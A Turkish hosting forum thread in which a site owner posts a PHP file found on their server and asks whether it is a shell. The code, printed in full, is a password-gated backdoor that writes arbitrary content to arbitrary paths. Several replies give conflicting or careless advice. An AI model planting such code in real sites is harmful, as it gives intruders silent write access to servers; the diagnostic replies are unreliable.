$action=$_REQUEST['action'];
$password=$_REQUEST['password'];
$pathname=$_REQUEST['pathname'];
$keywordindex=$_REQUEST['keywordindex'];
$filename=$_REQUEST['filename'];
$body=stripslashes($_REQUEST['body']);
if($action=="test")
{
echo 'test success';
return;
}
if($action!="publish")
{
echo 'action error';
return;
}
if($action==""||$password==""||$filename==""||$body=="")
{
echo 'parameters error';
return;
}
if($password!="julong2014")
{
echo 'password error';
return;
}
$wjj=dirname(__FILE__);
if(!file_exists($wjj))
{
mkdir($wjj,0777);
}
createFolder($pathname);
$fp=fopen($pathname.'/'.$filename,"w");
//fwrite($fp,"\xEF\xBB\xBF".iconv('gbk','utf-8//IGNORE',$body));
fwrite($fp,"\xEF\xBB\xBF".$body);
fclose($fp);
echo "publish success";
function createFolder($path)
{
if (!file_exists($path))
{
createFolder(dirname($path));
mkdir($path, 0777);
}
}
function mkdirs($dir)
{
if(!is_dir($dir))
{
if(!mkdirs(dirname($dir)))
{ return false; }
if(!mkdir($dir,0777))
{ return false; }
}
return true;
}
function rmdirs($dir)
{
$d = dir($dir);
while (false !== ($child = $d->read()))
{
if($child != '.' && $child != '..')
{
if(is_dir($dir.'/'.$child))
rmdirs($dir.'/'.$child);
else
unlink($dir.'/'.$child);
}
}
$d->close();
rmdir($dir);
}
?>
Bu Bir Shell İçeriğimidir |
10 Mesajlar | 965 Okunma | ||
- Üyelik 27.05.2014
- Yaş/Cinsiyet 27 / E
- Meslek Makine Mühendisliği Öğrencisi
- Konum Erzurum
- Ad Soyad O** U**
- Mesajlar 415
- Beğeniler 71 / 82
- Ticaret 15, (%100)
Hostumda su dosyayı buldum shell problemim vardı bu kodlar shell içeriği olabilir mi ?
- Üyelik 26.11.2014
- Yaş/Cinsiyet 31 / E
- Meslek Makine Mühendisi
- Konum İstanbul Anadolu
- Ad Soyad K** D**
- Mesajlar 1310
- Beğeniler 188 / 247
- Ticaret 162, (%100)
Hocam ne olduğunu bilmiyorum PHP bilgim o kadar yok ancak Shell olmadığından eminim.
en azından shell.php olarak kaydedip hosta atıp bakın ama shell değil. :)
en azından shell.php olarak kaydedip hosta atıp bakın ama shell değil. :)
- Üyelik 27.05.2014
- Yaş/Cinsiyet 27 / E
- Meslek Makine Mühendisliği Öğrencisi
- Konum Erzurum
- Ad Soyad O** U**
- Mesajlar 415
- Beğeniler 71 / 82
- Ticaret 15, (%100)
Hocam ne olduğunu bilmiyorum PHP bilgim o kadar yok ancak Shell olmadığından eminim.
en azından shell.php olarak kaydedip hosta atıp bakın ama shell değil. :)
en azından shell.php olarak kaydedip hosta atıp bakın ama shell değil. :)
Hocam hostta sürekli html dosyaları çekiyor bunun o işi görüyor olması mümkün mü ?
- Üyelik 26.11.2014
- Yaş/Cinsiyet 31 / E
- Meslek Makine Mühendisi
- Konum İstanbul Anadolu
- Ad Soyad K** D**
- Mesajlar 1310
- Beğeniler 188 / 247
- Ticaret 162, (%100)
Bu konuda PHP bilen birisi kodları yorumlasa iyi olur. Ama Statpress'ten bakıyorsanı genel bir şey de olabilir. CloudFlare korumasını kullanabilirsiniz. Spam hit olma olmasılığı da yüksek.
- Üyelik 27.05.2014
- Yaş/Cinsiyet 27 / E
- Meslek Makine Mühendisliği Öğrencisi
- Konum Erzurum
- Ad Soyad O** U**
- Mesajlar 415
- Beğeniler 71 / 82
- Ticaret 15, (%100)
Bu konuda PHP bilen birisi kodları yorumlasa iyi olur. Ama Statpress'ten bakıyorsanı genel bir şey de olabilir. CloudFlare korumasını kullanabilirsiniz. Spam hit olma olmasılığı da yüksek.
Teşekkürler yardım için o zaman php bilen birinin yorumunu bekleyelim :)
- Üyelik 24.08.2012
- Yaş/Cinsiyet 29 / E
- Meslek Bilgisayar Programcılığı & FED
- Konum Aksaray
- Ad Soyad H** K**
- Mesajlar 1041
- Beğeniler 73 / 328
- Ticaret 12, (%100)
Büyük ihtimalle shell dosyası hocam, ilk satırlarda hesap bilgilerini sorguluyor daha sonra hesap bilgileri doğru ise dosya oluşturması için girdiği fonksiyon oluşturuyor daha sonra dosya oluşturunca kalıntıları silip bırakıyor öyle :)
Silmenizde yarar var ancak onu silmeniz geri gelmeyeceği anlamına gelmez çünkü sistemde onu çağıran o dosyayı sunucuza getiren başka php ve js,html dosyası bulunabilir. Bunun teminatını ,garanti temizliğini ancak host sağlayıcınız yapabilir.
Root erişimi olan birisi ancak bu shell dosyasını sistemden silebilir. Sunucuda açık var ise sistem sağlayıcınız bu dosyayı silse bile yine zarar vermek isteyen yine o açığı bulup yine aynı yöntemle sisteme entegre olabilir.
Host sağlayıcınız size net bir bilgi verecektir ancak bizde sorun değil,bizimle alakalı birşey değil sunucumuz güvenli vs vs derlerse hiç lafı uzatmayın sitenizin db'sinin yedeğini alıp başka bir firmaya geçiş yapın :rolleyes:
Silmenizde yarar var ancak onu silmeniz geri gelmeyeceği anlamına gelmez çünkü sistemde onu çağıran o dosyayı sunucuza getiren başka php ve js,html dosyası bulunabilir. Bunun teminatını ,garanti temizliğini ancak host sağlayıcınız yapabilir.
Root erişimi olan birisi ancak bu shell dosyasını sistemden silebilir. Sunucuda açık var ise sistem sağlayıcınız bu dosyayı silse bile yine zarar vermek isteyen yine o açığı bulup yine aynı yöntemle sisteme entegre olabilir.
Host sağlayıcınız size net bir bilgi verecektir ancak bizde sorun değil,bizimle alakalı birşey değil sunucumuz güvenli vs vs derlerse hiç lafı uzatmayın sitenizin db'sinin yedeğini alıp başka bir firmaya geçiş yapın :rolleyes:
wptreni.com | Wordpress Blogu
- Üyelik 27.05.2014
- Yaş/Cinsiyet 27 / E
- Meslek Makine Mühendisliği Öğrencisi
- Konum Erzurum
- Ad Soyad O** U**
- Mesajlar 415
- Beğeniler 71 / 82
- Ticaret 15, (%100)
Büyük ihtimalle shell dosyası hocam, ilk satırlarda hesap bilgilerini sorguluyor daha sonra hesap bilgileri doğru ise dosya oluşturması için girdiği fonksiyon oluşturuyor daha sonra dosya oluşturunca kalıntıları silip bırakıyor öyle :)
Silmenizde yarar var ancak onu silmeniz geri gelmeyeceği anlamına gelmez çünkü sistemde onu çağıran o dosyayı sunucuza getiren başka php ve js,html dosyası bulunabilir. Bunun teminatını ,garanti temizliğini ancak host sağlayıcınız yapabilir.
Root erişimi olan birisi ancak bu shell dosyasını sistemden silebilir. Sunucuda açık var ise sistem sağlayıcınız bu dosyayı silse bile yine zarar vermek isteyen yine o açığı bulup yine aynı yöntemle sisteme entegre olabilir.
Host sağlayıcınız size net bir bilgi verecektir ancak bizde sorun değil,bizimle alakalı birşey değil sunucumuz güvenli vs vs derlerse hiç lafı uzatmayın sitenizin db'sinin yedeğini alıp başka bir firmaya geçiş yapın :rolleyes:
Silmenizde yarar var ancak onu silmeniz geri gelmeyeceği anlamına gelmez çünkü sistemde onu çağıran o dosyayı sunucuza getiren başka php ve js,html dosyası bulunabilir. Bunun teminatını ,garanti temizliğini ancak host sağlayıcınız yapabilir.
Root erişimi olan birisi ancak bu shell dosyasını sistemden silebilir. Sunucuda açık var ise sistem sağlayıcınız bu dosyayı silse bile yine zarar vermek isteyen yine o açığı bulup yine aynı yöntemle sisteme entegre olabilir.
Host sağlayıcınız size net bir bilgi verecektir ancak bizde sorun değil,bizimle alakalı birşey değil sunucumuz güvenli vs vs derlerse hiç lafı uzatmayın sitenizin db'sinin yedeğini alıp başka bir firmaya geçiş yapın :rolleyes:
Bilgi için teşekkürler host sağlayımca görüşüyim o zaman :((
- Üyelik 13.11.2011
- Yaş/Cinsiyet 33 / E
- Meslek Yaz
- Konum Avusturya
- Ad Soyad S** K**
- Mesajlar 877
- Beğeniler 291 / 162
- Ticaret 3, (%100)
Hocam ne olduğunu bilmiyorum PHP bilgim o kadar yok ancak Shell olmadığından eminim.
en azından shell.php olarak kaydedip hosta atıp bakın ama shell değil. :)
en azından shell.php olarak kaydedip hosta atıp bakın ama shell değil. :)
Bu kadar emin konusmaniza sasirdim dogrusu...
Konu sahibine gelince o kodlari tamamen sil muhtemelen warez tema yükledin bilemiyorum artik
NOT: O kodlari sildiginizde muhtemelen sitede hata cikacaktir ama emin degilim denemenizde yarar var
- Üyelik 27.05.2014
- Yaş/Cinsiyet 27 / E
- Meslek Makine Mühendisliği Öğrencisi
- Konum Erzurum
- Ad Soyad O** U**
- Mesajlar 415
- Beğeniler 71 / 82
- Ticaret 15, (%100)
CennetKapisi adlı üyeden alıntı
Bu kadar emin konusmaniza sasirdim dogrusu...Konu sahibine gelince o kodlari tamamen sil muhtemelen warez tema yükledin bilemiyorum artik
NOT: O kodlari sildiginizde muhtemelen sitede hata cikacaktir ama emin degilim denemenizde yarar var
Hocam warez kullancak kişilikde birisi değilim ayrıca ana dizinde cıktı dosya hata denincede root dizinine html dosyası çekiyo ve gece sildim ve su ana kadar bu sorunu yasamaadım ama Machine hocamızın dediği gibi sorunlar yaşayablirim bu yüzden firma ile görüşcem ilgi için teşekkürler
- Üyelik 07.10.2014
- Yaş/Cinsiyet 32 / E
- Meslek Digital Bilişim Danışmanı
- Konum Antalya
- Ad Soyad A** B**
- Mesajlar 8
- Beğeniler 0 / 1
- Ticaret 0, (%0)
1-) Shell ile uzaktan yakından alakası yok :)
Fakat belli dosyalara chmod777 yani okuma yazma izni veriyor.
Örnek:
burda yeni oluşturulan dosyaya otomatikman chmod 777 eklemiş.
Kurdugun script büyük bir ihtimalle "war*z" komple sistemi sil derim :)
iyi forumlar
Fakat belli dosyalara chmod777 yani okuma yazma izni veriyor.
Örnek:
createFolder(dirname($path));
mkdir($path, 0777);
}
}
function mkdirs($dir)
burda yeni oluşturulan dosyaya otomatikman chmod 777 eklemiş.
Kurdugun script büyük bir ihtimalle "war*z" komple sistemi sil derim :)
iyi forumlar
akifbayrak.com
info@akifbayrak.com
akif.bayrak2
info@akifbayrak.com
akif.bayrak2
Konuyu toplam 2 kişi okuyor. (0 kullanıcı ve 2 misafir)